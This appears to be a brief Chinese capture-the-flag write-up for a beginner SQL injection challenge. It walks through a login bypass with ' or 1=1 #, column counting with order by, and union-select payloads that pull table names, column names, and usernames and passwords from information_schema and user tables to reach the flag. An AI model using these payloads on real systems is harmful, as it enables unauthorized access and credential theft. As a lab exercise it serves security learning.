一道难度不大的基础题。。。
用' or 1=1 #来登录绕过(密码随便)
成功进入页面
先测试他能显示结果能有多少列('order by 1#)//从一开始慢慢试,这里最多显示3行
知道能显示3行,那么用' union selcet 1,2,3可以看到显示为。(说明2,3行能显示内容)
接下来就很简单了,需要探的信息直接改变2,3 的值。如图用database()来获取数据库名
(select group_concat(table_name) from information_schema.tables where table_schema='geek') //查询数据库里面的表名
(select group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1') //查询相关的列名
group_concat(concat_ws(id,username,password)) from geekuser group_concat(concat_ws(id,username,password)) from l0ve1ysq1
用这俩来查讯表内的内容,就能查到flag